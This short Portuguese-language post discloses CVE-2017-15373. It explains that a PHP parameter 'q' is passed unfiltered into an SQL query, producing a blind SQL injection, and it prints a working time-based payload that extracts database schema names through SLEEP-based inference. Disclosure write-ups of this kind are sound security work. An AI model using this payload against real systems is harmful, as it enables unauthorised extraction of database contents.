A vulnerabilidade – CVE-2017-15373
Analisando um pedaço do código, observei uma parte sem restrição de acesso nenhum e sem filtro nenhum para as entradas do usuário.

Como é possível ver, a variavel $q está recebendo um “$_REQUEST[‘q’]” e está passando para dentro de uma query sql sem nenhum tipo de verificação prévia.
Isso é um blind sql injection, então, você poderá perder bastante tempo com isso, o payload usado foi o seguinte:
1′ AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)– UACx
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15373
Pingback: CVE-2017-15373 – 安百科技